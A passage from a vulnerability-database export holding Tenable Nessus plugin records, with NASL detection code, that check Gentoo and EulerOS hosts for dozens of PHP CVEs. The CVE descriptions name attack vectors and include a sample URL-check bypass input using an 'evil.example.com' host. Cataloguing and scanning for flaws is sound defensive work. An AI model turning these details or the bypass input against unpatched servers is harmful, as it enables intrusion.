"CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:php", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201611-22.NASL", "href": "https://www.tenable.com/plugins/nessus/95421", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201611-22.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95421);\n script_version(\"3.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-8865\", \"CVE-2016-3074\", \"CVE-2016-4071\", \"CVE-2016-4072\", \"CVE-2016-4073\", \"CVE-2016-4537\", \"CVE-2016-4538\", \"CVE-2016-4539\", \"CVE-2016-4540\", \"CVE-2016-4541\", \"CVE-2016-4542\", \"CVE-2016-4543\", \"CVE-2016-4544\", \"CVE-2016-5385\", \"CVE-2016-6289\", \"CVE-2016-6290\", \"CVE-2016-6291\", \"CVE-2016-6292\", \"CVE-2016-6294\", \"CVE-2016-6295\", \"CVE-2016-6296\", \"CVE-2016-6297\", \"CVE-2016-7124\", \"CVE-2016-7125\", \"CVE-2016-7126\", \"CVE-2016-7127\", \"CVE-2016-7128\", \"CVE-2016-7129\", \"CVE-2016-7130\", \"CVE-2016-7131\", \"CVE-2016-7132\", \"CVE-2016-7133\", \"CVE-2016-7134\", \"CVE-2016-7411\", \"CVE-2016-7412\", \"CVE-2016-7413\", \"CVE-2016-7414\", \"CVE-2016-7416\", \"CVE-2016-7417\", \"CVE-2016-7418\");\n script_xref(name:\"GLSA\", value:\"201611-22\");\n\n script_name(english:\"GLSA-201611-22 : PHP: Multiple vulnerabilities (httpoxy)\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201611-22\n(PHP: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in PHP. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n An attacker can possibly execute arbitrary code or create a Denial of\n Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201611-22\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All PHP users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev=lang/php-5.6.28'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-lang/php\", unaffected:make_list(\"ge 5.6.28\"), vulnerable:make_list(\"lt 5.6.28\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"PHP\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-17T15:30:21", "description": "According to the versions of the php packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - ** DISPUTED ** Integer overflow in the php_raw_url_encode function in ext/standard/url.c in PHP before 5.5.34, 5.6.x before 5.6.20, and 7.x before 7.0.5 allows remote attackers to cause a denial of service (application crash) via a long string to the rawurlencode function. NOTE: the vendor says 'Not sure if this qualifies as security issue (probably not).'(CVE-2016-4070)\n\n - An issue was discovered in ext/phar/phar_object.c in PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before 7.1.17, and 7.2.x before 7.2.5. There is Reflected XSS on the PHAR 403 and 404 error pages via request data of a request for a .phar file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2018-5712.(CVE-2018-10547)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A heap out-of-bounds write occurs in bitset_set_range() during regular expression compilation due to an uninitialized variable from an incorrect state transition. An incorrect state transition in parse_char_class() could create an execution path that leaves a critical local variable uninitialized until it's used as an index, resulting in an out-of-bounds write memory corruption.(CVE-2017-9228)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A heap out-of-bounds write or read occurs in next_state_val() during regular expression compilation. Octal numbers larger than 0xff are not handled correctly in fetch_token() and fetch_token_in_cc(). A malformed regular expression containing an octal number in the form of '\\700' would produce an invalid code point value larger than 0xff in next_state_val(), resulting in an out-of-bounds write memory corruption.(CVE-2017-9226)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A SIGSEGV occurs in left_adjust_char_head() during regular expression compilation. Invalid handling of reg->dmax in forward_search_range() could result in an invalid pointer dereference, normally as an immediate denial-of-service condition.(CVE-2017-9229)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A stack out-of-bounds read occurs in match_at() during regular expression searching. A logical error involving order of validation and access in match_at() could result in an out-of-bounds read from a stack buffer.(CVE-2017-9224)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A stack out-of-bounds read occurs in mbc_enc_len() during regular expression searching.\n Invalid handling of reg->dmin in forward_search_range() could result in an invalid pointer dereference, as an out-of-bounds read from a stack buffer.(CVE-2017-9227)\n\n - An issue was discovered in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1. There is Reflected XSS on the PHAR 404 error page via the URI of a request for a .phar file.(CVE-2018-5712)\n\n - An issue was discovered in PHP before 5.6.35, 7.0.x before 7.0.29, 7.1.x before 7.1.16, and 7.2.x before 7.2.4. Dumpable FPM child processes allow bypassing opcache access controls because fpm_unix.c makes a PR_SET_DUMPABLE prctl call, allowing one user (in a multiuser environment) to obtain sensitive information from the process memory of a second user's PHP applications by running gcore on the PID of the PHP-FPM worker process.(CVE-2018-10545)\n\n - Directory traversal vulnerability in the PharData class in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 allows remote attackers to write to arbitrary files via a .. (dot dot) in a ZIP archive entry that is mishandled during an extractTo call.(CVE-2015-6833)\n\n - Directory traversal vulnerability in the ZipArchive::extractTo function in ext/zip/php_zip.c in PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x before 5.6.13 and ext/zip/ext_zip.cpp in HHVM before 3.12.1 allows remote attackers to create arbitrary empty directories via a crafted ZIP archive.(CVE-2014-9767)\n\n - exif_process_IFD_in_MAKERNOTE in ext/exif/exif.c in PHP before 5.6.37, 7.0.x before 7.0.31, 7.1.x before 7.1.20, and 7.2.x before 7.2.8 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted JPEG file.(CVE-2018-14851)\n\n - ext/libxml/libxml.c in PHP before 5.5.22 and 5.6.x before 5.6.6, when PHP-FPM is used, does not isolate each thread from libxml_disable_entity_loader changes in other threads, which allows remote attackers to conduct XML External Entity (XXE) and XML Entity Expansion (XEE) attacks via a crafted XML document, a related issue to CVE-2015-5161.(CVE-2015-8866)\n\n - ext/mysqlnd/mysqlnd_wireprotocol.c in PHP before 5.6.26 and 7.x before 7.0.11 does not verify that a BIT field has the UNSIGNED_FLAG flag, which allows remote MySQL servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact via crafted field metadata.(CVE-2016-7412)\n\n - ext/session/session.c in PHP before 5.6.25 and 7.x before 7.0.10 skips invalid session names in a way that triggers incorrect parsing, which allows remote attackers to inject arbitrary-type session data by leveraging control of a session name, as demonstrated by object injection.(CVE-2016-7125)\n\n - ext/standard/var_unserializer.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles certain invalid objects, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that leads to a (1)\n __destruct call or (2) magic method call.(CVE-2016-7124)\n\n - ext/standard/var_unserializer.re in PHP before 5.6.26 mishandles object-deserialization failures, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via an unserialize call that references a partially constructed object.(CVE-2016-7411)\n\n - ext/wddx/wddx.c in PHP before 5.6.28 and 7.x before 7.0.13 allows remote attackers to cause a denial of service (NULL pointer dereference) via crafted serialized data in a wddxPacket XML document, as demonstrated by a PDORow string.(CVE-2016-9934)\n\n - gd_gif_in.c in the GD Graphics Library (aka libgd), as used in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1, has an integer signedness error that leads to an infinite loop via a crafted GIF file, as demonstrated by a call to the imagecreatefromgif or imagecreatefromstring PHP function. This is related to GetCode_ and gdImageCreateFromGifCtx.(CVE-2018-5711)\n\n - In PHP before 5.6.28 and 7.x before 7.0.13, incorrect handling of various URI components in the URL parser could be used by attackers to bypass hostname-specific URL checks, as demonstrated by evil.example.com:80#@good.example.com/ and evil.example.com:80?@good.example.com/ inputs to the parse_url function (implemented in the php_url_parse_ex function in ext/standard/url.c).(CVE-2016-10397)\n\n - In PHP before 5.6.30 and 7.x before 7.0.15, the PHAR archive handler could be used by attackers supplying malicious archive files to crash the PHP interpreter or potentially disclose information due to a buffer over-read in the phar_parse_pharfile function in ext/phar/phar.c.(CVE-2017-11147)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x before 7.1.7, a stack-based buffer overflow in the zend_ini_do_op() function in Zend/zend_ini_parser.c could cause a denial of service or potentially allow executing code. NOTE: this is only relevant for PHP applications that accept untrusted input (instead of the system's php.ini file) for the parse_ini_string or parse_ini_file function, e.g., a web application for syntax validation of php.ini directives.(CVE-2017-11628)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x before 7.1.7, the openssl extension PEM sealing code did not check the return value of the OpenSSL sealing function, which could lead to a crash of the PHP interpreter, related to an interpretation conflict for a negative number in ext/openssl/openssl.c, and an OpenSSL documentation omission.(CVE-2017-11144)\n\n - In PHP before 5.6.31, an invalid free in the WDDX deserialization of boolean parameters could be used by attackers able to inject XML for deserialization to crash the PHP interpreter, related to an invalid free for an empty boolean element in ext/wddx/wddx.c.(CVE-2017-11143)\n\n - In PHP before 5.6.32, 7.x before 7.0.25, and 7.1.x before 7.1.11, an error in the date extension's timelib_meridian handling of 'front of' and 'back of' directives could be used by attackers able to supply date strings to leak information from the interpreter, related to ext/date/lib/parse_date.c out-of-bounds reads affecting the php_parse_date function. NOTE: this is a different issue than CVE-2017-11145.(CVE-2017-16642)\n\n - In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 in certain configurations of FPM setup it is possible to cause FPM module to write past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution.(CVE-2019-11043)\n\n - Integer overflow in the phar_parse_pharfile function in ext/phar/phar.c in PHP before 5.6.30 and 7.0.x before 7.0.15 allows remote attackers to cause a denial of service (memory consumption or application crash) via a truncated manifest entry in a PHAR archive.(CVE-2016-10159)\n\n - Integer overflow in the php_html_entities function in ext/standard/html.c in PHP before 5.5.36 and 5.6.x before 5.6.22 allows remote attackers to cause a denial of service or possibly have unspecified other impact by triggering a large output string from the htmlspecialchars function.(CVE-2016-5094)\n\n - Multiple use-after-free vulnerabilities in SPL in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 allow remote attackers to execute arbitrary code via vectors involving (1) ArrayObject, (2) SplObjectStorage, and (3) SplDoublyLinkedList, which are mishandled during unserialization.(CVE-2015-6831)\n\n - Off-by-one error in the phar_parse_zipfile function in ext/phar/zip.c in PHP before 5.5.30 and 5.6.x before 5.6.14 allows remote attackers to cause a denial of service (uninitialized pointer dereference and application crash) by including the / filename in a .zip PHAR archive.(CVE-2015-7804)\n\n - PHP through 7.1.11 enables potential SSRF in applications that accept an fsockopen or pfsockopen hostname argument with an expectation that the port number is constrained. Because a :port syntax is recognized, fsockopen will use the port number that is specified in the hostname argument, instead of the port number in the second argument of the function.(CVE-2017-7272)\n\n - Session fixation vulnerability in the Sessions subsystem in PHP before 5.5.2 allows remote attackers to hijack web sessions by specifying a session ID.(CVE-2011-4718)\n\n - Stack consumption vulnerability in GD in PHP before 5.6.12 allows remote attackers to cause a denial of service via a crafted imagefilltoborder call.(CVE-2015-8874)\n\n - Stack-based buffer overflow in ext/phar/tar.c in PHP before 5.5.32, 5.6.x before 5.6.18, and 7.x before 7.0.3 allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a crafted TAR archive.(CVE-2016-2554)\n\n - The Apache2 component in PHP before 5.6.38, 7.0.x before 7.0.32, 7.1.x before 7.1.22, and 7.2.x before 7.2.10 allows XSS via the body of a 'Transfer-Encoding:\n chunked' request, because the bucket brigade is mishandled in the php_handler function in sapi/apache2handler/sapi_apache2.c.(CVE-2018-17082)\n\n - The exif_convert_any_to_int function in ext/exif/exif.c in PHP before 5.6.30, 7.0.x before 7.0.15, and 7.1.x before 7.1.1 allows remote attackers to cause a denial of service (application crash) via crafted EXIF data that triggers an attempt to divide the minimum representable negative integer by -1.(CVE-2016-10158)\n\n - The exif_process_IFD_in_JPEG function in ext/exif/exif.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 does not validate IFD sizes, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via crafted header data.(CVE-2016-4543)\n\n - The exif_process_IFD_in_MAKERNOTE function in ext/exif/exif.c in PHP before 5.5.38, 5.6.x before 5.6.24, and 7.x before 7.0.9 allows remote attackers to cause a denial of service (out-of-bounds array access and memory corruption), obtain sensitive information from process memory, or possibly have unspecified other impact via a crafted JPEG image.(CVE-2016-6291)\n\n - The exif_process_IFD_in_TIFF function in ext/exif/exif.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles the case of a thumbnail offset that exceeds the file size, which allows remote attackers to obtain sensitive information from process memory via a crafted TIFF image.(CVE-2016-7128)\n\n - The exif_process_IFD_TAG function in ext/exif/exif.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 does not properly construct spprintf arguments, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via crafted header data.(CVE-2016-4542)\n\n - The exif_process_user_comment function in ext/exif/exif.c in PHP before 5.5.38, 5.6.x before 5.6.24, and 7.x before 7.0.9 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted JPEG image.(CVE-2016-6292)\n\n - The finish_nested_data function in ext/standard/var_unserializer.re in PHP before 5.6.31, 7.0.x before 7.0.21, and 7.1.x before 7.1.7 is prone to a buffer over-read while unserializing untrusted data.\n Exploitation of this issue can have an unspecified impact on the integrity of PHP.(CVE-2017-12933)\n\n - The get_icu_disp_value_src_php function in ext/intl/locale/locale_methods.c in PHP before 5.3.29, 5.4.x before 5.4.30, and 5.5.x before 5.5.14 does not properly restrict calls to the ICU uresbund.cpp component, which allows remote attackers to cause a denial of service (buffer overflow) or possibly have unspecified other impact via a locale_get_display_name call with a long first argument.(CVE-2014-9912)\n\n - The get_icu_value_internal function in ext/intl/locale/locale_methods.c in PHP before 5.5.36, 5.6.x before 5.6.22, and 7.x before 7.0.7 does not ensure the presence of a '\\0' character, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a crafted locale_get_primary_language call.(CVE-2016-5093)\n\n - The grapheme_stripos function in ext/intl/grapheme/grapheme_string.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a negative offset.(CVE-2016-4540)\n\n - The grapheme_strpos function in ext/intl/grapheme/grapheme_string.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a negative offset.(CVE-2016-4541)\n\n - The locale_accept_from_http function in ext/intl/locale/locale_methods.c in PHP before 5.5.38, 5.6.x before 5.6.24, and 7.x before 7.0.9 does not properly restrict calls to the ICU uloc_acceptLanguageFromHTTP function, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a call with a long argument.(CVE-2016-6294)\n\n - The make_http_soap_request function in ext/soap/php_http.c in PHP before 5.4.44, 5.5.x before 5.5.28, 5.6.x before 5.6.12, and 7.x before 7.0.4 allows remote attackers to obtain sensitive information from process memory or cause a denial of service (type confusion and application crash) via crafted serialized\n _cookies data, related to the SoapClient::__call method in ext/soap/soap.c.(CVE-2016-3185)\n\n - The make_http_soap_request function in ext/soap/php_http.c in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 does not properly retrieve keys, which allows remote attackers to cause a denial of service (NULL pointer dereference, type confusion, and application crash) or possibly execute arbitrary code via crafted serialized data representing a numerically indexed _cookies array, related to the SoapClient::__call method in ext/soap/soap.c.(CVE-2015-8835)\n\n - The object_common1 function in ext/standard/var_unserializer.c in PHP before 5.6.30, 7.0.x before 7.0.15, and 7.1.x before 7.1.1 allows remote attackers to cause a denial of service (buffer over-read and application crash) via crafted serialized data that is mishandled in a finish_nested_data call.(CVE-2016-10161)\n\n - The odbc_bindcols function in ext/odbc/php_odbc.c in PHP before 5.6.12 mishandles driver behavior for SQL_WVARCHAR columns, which allows remote attackers to cause a denial of service (application crash) in opportunistic circumstances by leveraging use of the odbc_fetch_array function to access a certain type of Microsoft SQL Server table.(CVE-2015-8879)\n\n - The phar_convert_to_other function in ext/phar/phar_object.c in PHP before 5.4.43, 5.5.x before 5.5.27, and 5.6.x before 5.6.11 does not validate a file pointer before a close operation, which allows remote attackers to cause a denial of service (segmentation fault) or possibly have unspecified other impact via a crafted TAR archive that is mishandled in a Phar::convertToData call.(CVE-2015-5589)\n\n - The phar_get_entry_data function in ext/phar/util.c in PHP before 5.5.30 and 5.6.x before 5.6.14 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a .phar file with a crafted TAR archive entry in which the Link indicator references a file that does not exist.(CVE-2015-7803)\n\n - The phar_parse_zipfile function in zip.c in the PHAR extension in PHP before 5.5.33 and 5.6.x before 5.6.19 allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read and application crash) by placing a PK\\x05\\x06 signature at an invalid location.(CVE-2016-3142)\n\n - The php_url_parse_ex function in ext/standard/url.c in PHP before 5.5.38 allows remote attackers to cause a denial of service (buffer over-read) or possibly have unspecified other impact via vectors involving the smart_str data type.(CVE-2016-6288)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service (invalid pointer access and out-of-bounds read) or possibly have unspecified other impact via an incorrect boolean element in a wddxPacket XML document, leading to mishandling in a wddx_deserialize call.(CVE-2016-7418)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.29 and 7.x before 7.0.14 allows remote attackers to cause a denial of service (out-of-bounds read and memory corruption) or possibly have unspecified other impact via an empty boolean element in a wddxPacket XML document.(CVE-2016-9935)\n\n - The sapi_header_op function in main/SAPI.c in PHP before 5.4.38, 5.5.x before 5.5.22, and 5.6.x before 5.6.6 supports deprecated line folding without considering browser compatibility, which allows remote attackers to conduct cross-site scripting (XSS) attacks against Internet Explorer by leveraging (1) %0A%20 or (2) %0D%0A%20 mishandling in the header function.(CVE-2015-8935)\n\n - The SplObjectStorage unserialize implementation in ext/spl/spl_observer.c in PHP before 7.0.12 does not verify that a key is an object, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access) via crafted serialized data.(CVE-2016-7480)\n\n - The xml_parse_into_struct function in ext/xml/xml.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 allows remote attackers to cause a denial of service (buffer under-read and segmentation fault) or possibly have unspecified other impact via crafted XML data in the second argument, leading to a parser level of zero.(CVE-2016-4539)\n\n - The ZIP signature-verification feature in PHP before 5.6.26 and 7.x before 7.0.11 does not ensure that the uncompressed_filesize field is large enough, which allows remote attackers to cause a denial of service (out-of-bounds memory access) or possibly have unspecified other impact via a crafted PHAR archive, related to ext/phar/util.c and ext/phar/zip.c.(CVE-2016-7414)\n\n - Use-after-free vulnerability in the SPL unserialize implementation in ext/spl/spl_array.c in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 allows remote attackers to execute arbitrary code via crafted serialized data that triggers misuse of an array field.(CVE-2015-6832)\n\n - Use-after-free vulnerability in the spl_ptr_heap_insert function in ext/spl/spl_heap.c in PHP before 5.5.27 and 5.6.x before 5.6.11 allows remote attackers to execute arbitrary code by triggering a failed SplMinHeap::compare operation.(CVE-2015-4116)\n\n - Use-after-free vulnerability in wddx.c in the WDDX extension in PHP before 5.5.33 and 5.6.x before 5.6.19 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact by triggering a wddx_deserialize call on XML data containing a crafted var element.(CVE-2016-3141)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-12-18T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP3 : php (EulerOS-SA-2019-2649)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4718", "CVE-2014-9767", "CVE-2014-9912", "CVE-2015-4116", "CVE-2015-5161", "CVE-2015-5589", "CVE-2015-6831", "CVE-2015-6832", "CVE-2015-6833", "CVE-2015-7803", "CVE-2015-7804", "CVE-2015-8835", "CVE-2015-8866", "CVE-2015-8874", "CVE-2015-8879", "CVE-2015-8935", "CVE-2016-10158", "CVE-2016-10159", "CVE-2016-10161", "CVE-2016-10397", "CVE-2016-2554", "CVE-2016-3141", "CVE-2016-3142", "CVE-2016-3185", "CVE-2016-4070", "CVE-2016-4539", "CVE-2016-4540", "CVE-2016-4541", "CVE-2016-4542", "CVE-2016-4543", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-6288", "CVE-2016-6291", "CVE-2016-6292", "CVE-2016-6294", "CVE-2016-7124", "CVE-2016-7125", "CVE-2016-7128", "CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7414", "CVE-2016-7418", "CVE-2016-7480", "CVE-2016-9934", "CVE-2016-9935", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11147", "CVE-2017-11628", "CVE-2017-12933", "CVE-2017-16642", "CVE-2017-7272", "CVE-2017-9224", "CVE-2017-9226", "CVE-2017-9227", "CVE-2017-9228", "CVE-2017-9229", "CVE-2018-10545", "CVE-2018-10547", "CVE-2018-14851", "CVE-2018-17082", "CVE-2018-5711", "CVE-2018-5712", "CVE-2019-11043"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:php", "p-cpe:/a:huawei:euleros:php-cli", "p-cpe:/a:huawei:euleros:php-common", "p-cpe:/a:huawei:euleros:php-gd", "p-cpe:/a:huawei:euleros:php-ldap", "p-cpe:/a:huawei:euleros:php-mysql", "p-cpe:/a:huawei:euleros:php-odbc", "p-cpe:/a:huawei:euleros:php-pdo", "p-cpe:/a:huawei:euleros:php-pgsql", "p-cpe:/a:huawei:euleros:php-process", "p-cpe:/a:huawei:euleros:php-recode", "p-cpe:/a:huawei:euleros:php-soap", "p-cpe:/a:huawei:euleros:php-xml", "p-cpe:/a:huawei:euleros:php-xmlrpc", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-2649.NASL", "href": "https://www.tenable.com/plugins/nessus/132184", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132184);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2011-4718\",\n \"CVE-2014-9767\",\n \"CVE-2014-9912\",\n \"CVE-2015-4116\",\n \"CVE-2015-5589\",\n \"CVE-2015-6831\",\n \"CVE-2015-6832\",\n \"CVE-2015-6833\",\n \"CVE-2015-7803\",\n \"CVE-2015-7804\",\n \"CVE-2015-8835\",\n \"CVE-2015-8866\",\n \"CVE-2015-8874\",\n \"CVE-2015-8879\",\n \"CVE-2015-8935\",\n \"CVE-2016-10158\",\n \"CVE-2016-10159\",\n \"CVE-2016-10161\",\n \"CVE-2016-10397\",\n \"CVE-2016-2554\",\n \"CVE-2016-3141\",\n \"CVE-2016-3142\",\n \"CVE-2016-3185\",\n \"CVE-2016-4070\",\n \"CVE-2016-4539\",\n \"CVE-2016-4540\",\n \"CVE-2016-4541\",\n \"CVE-2016-4542\",\n \"CVE-2016-4543\",\n \"CVE-2016-5093\",\n \"CVE-2016-5094\",\n \"CVE-2016-6288\",\n \"CVE-2016-6291\",\n \"CVE-2016-6292\",\n \"CVE-2016-6294\",\n \"CVE-2016-7124\",\n \"CVE-2016-7125\",\n \"CVE-2016-7128\",\n \"CVE-2016-7411\",\n \"CVE-2016-7412\",\n \"CVE-2016-7414\",\n \"CVE-2016-7418\",\n \"CVE-2016-7480\",\n \"CVE-2016-9934\",\n \"CVE-2016-9935\",\n \"CVE-2017-11143\",\n \"CVE-2017-11144\",\n \"CVE-2017-11147\",\n \"CVE-2017-11628\",\n \"CVE-2017-12933\",\n \"CVE-2017-16642\",\n \"CVE-2017-7272\",\n \"CVE-2017-9224\",\n \"CVE-2017-9226\",\n \"CVE-2017-9227\",\n \"CVE-2017-9228\",\n \"CVE-2017-9229\",\n \"CVE-2018-10545\",\n \"CVE-2018-10547\",\n \"CVE-2018-14851\",\n \"CVE-2018-17082\",\n \"CVE-2018-5711\",\n \"CVE-2018-5712\",\n \"CVE-2019-11043\"\n );\n script_bugtraq_id(61929, 75974);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0695\");\n\n script_name(english:\"EulerOS 2.0 SP3 : php (EulerOS-SA-2019-2649)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the php packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - ** DISPUTED ** Integer overflow in the\n php_raw_url_encode function in ext/standard/url.c in\n PHP before 5.5.34, 5.6.x before 5.6.20, and 7.x before\n 7.0.5 allows remote attackers to cause a denial of\n service (application crash) via a long string to the\n rawurlencode function. NOTE: the vendor says 'Not sure\n if this qualifies as security issue (probably\n not).'(CVE-2016-4070)\n\n - An issue was discovered in ext/phar/phar_object.c in\n PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before\n 7.1.17, and 7.2.x before 7.2.5. There is Reflected XSS\n on the PHAR 403 and 404 error pages via request data of\n a request for a .phar file. NOTE: this vulnerability\n exists because of an incomplete fix for\n CVE-2018-5712.(CVE-2018-10547)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in\n Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP\n through 7.1.5. A heap out-of-bounds write occurs in\n bitset_set_range() during regular expression\n compilation due to an uninitialized variable from an\n incorrect state transition. An incorrect state\n transition in parse_char_class() could create an\n 